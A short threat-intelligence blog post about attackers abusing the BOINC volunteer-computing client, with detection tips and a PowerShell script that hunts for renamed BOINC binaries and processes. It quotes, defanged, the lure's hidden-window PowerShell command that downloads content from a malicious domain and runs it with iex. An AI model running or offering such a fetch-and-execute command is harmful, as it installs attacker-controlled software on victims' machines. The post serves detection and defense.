015. Threat Actors Can Abuse Even This Kind of Software
Hello everyone! A recent Unit 42 notification reminded me about VERY curious legitimate software abused by adversaries. It's BOINC, or Berkeley Open Infrastructure for Network Computing - open-source software that allows users to contribute computing power to scientific research projects focused on solving complex calculations.
The infection process is interesting as well. The victim is redirected to a malicious website with fake checks and is instructed to paste and run a PowerShell script:
powershell -WindowStyle Hidden $global:block=curl -useb hxxp[:]//lggknhaffleahbh[.]top/1.php?s=527;iex $global:block.content
The script leads to installation of the BOINC client. Why does the adversary use BOINC? It can collect information about the host and receive tasks from a server for execution on it!
So, what to look for? Here are a few detection and hunting tips:
- Look for renamed BOINC executables
- Look for executables with metadata related to BOINC, for example: "BOINC Client", "boinc.exe", etc.
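Both tips come down to one idea: match on the version metadata compiled into the binary, not on the file name the attacker chose. The PowerShell below is an added example (not code from the original post or from Unit 42) that applies that idea to files on disk and to running processes. The scan roots and the match pattern are assumptions; tune them to the environment you are hunting in.

```powershell
# Added example, not code from the original post: hunt for BOINC binaries by
# their PE version-info strings so that renamed copies surface as well.
# Scan roots and the match pattern below are assumptions, not values from the post.

function Find-BoincBinary {
    [CmdletBinding()]
    param(
        # Directories a user-level dropper can write to without admin rights (assumed roots)
        [string[]]$Root = @($env:ProgramData, $env:LOCALAPPDATA, $env:APPDATA, $env:TEMP),
        # Case-insensitive regex applied to the version-info strings
        [string]$Pattern = 'boinc'
    )

    Get-ChildItem -Path $Root -Recurse -File -Include *.exe, *.dll -ErrorAction SilentlyContinue |
    ForEach-Object {
        $vi = $_.VersionInfo
        # Version-info strings that carry the vendor's own naming of the binary
        $meta = @($vi.OriginalFilename, $vi.InternalName, $vi.ProductName,
                  $vi.FileDescription, $vi.CompanyName) -join ' '
        if ($meta -match $Pattern) {
            # "Renamed" means the on-disk name differs from the OriginalFilename
            # stored in the resource section; that is the first tip from the post
            $renamed = [bool]($vi.OriginalFilename) -and ($_.Name -ine $vi.OriginalFilename)
            [pscustomobject]@{
                Path             = $_.FullName
                OriginalFilename = $vi.OriginalFilename
                ProductName      = $vi.ProductName
                FileDescription  = $vi.FileDescription
                Renamed          = $renamed
                SHA256           = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
            }
        }
    }
}

function Find-BoincProcess {
    [CmdletBinding()]
    param([string]$Pattern = 'boinc')

    Get-Process -ErrorAction SilentlyContinue | ForEach-Object {
        # MainModule cannot be read for protected or higher-integrity processes; skip those
        try { $vi = $_.MainModule.FileVersionInfo } catch { return }
        $meta = @($vi.OriginalFilename, $vi.InternalName, $vi.ProductName,
                  $vi.FileDescription, $vi.CompanyName) -join ' '
        if ($meta -match $Pattern) {
            # Command line tells you which project server / options the client was started with
            $cmd = (Get-CimInstance Win32_Process -Filter "ProcessId = $($_.Id)").CommandLine
            $renamed = [bool]($vi.OriginalFilename) -and ("$($_.ProcessName).exe" -ine $vi.OriginalFilename)
            [pscustomobject]@{
                Pid              = $_.Id
                Name             = $_.ProcessName
                Path             = $_.Path
                OriginalFilename = $vi.OriginalFilename
                Renamed          = $renamed
                CommandLine      = $cmd
            }
        }
    }
}

Find-BoincBinary  | Format-Table -AutoSize
Find-BoincProcess | Format-Table -AutoSize
```

The same comparison works over telemetry you already collect: Sysmon process-creation events (Event ID 1) carry an OriginalFileName field, so a query for events where OriginalFileName contains "boinc" but the Image file name does not is the log-side equivalent of the Renamed column above. Expect a BOINC client installed on purpose by a user or research group to hit the metadata match too; the renamed-binary condition and an unusual install path or parent process are what separate the abuse case from legitimate use.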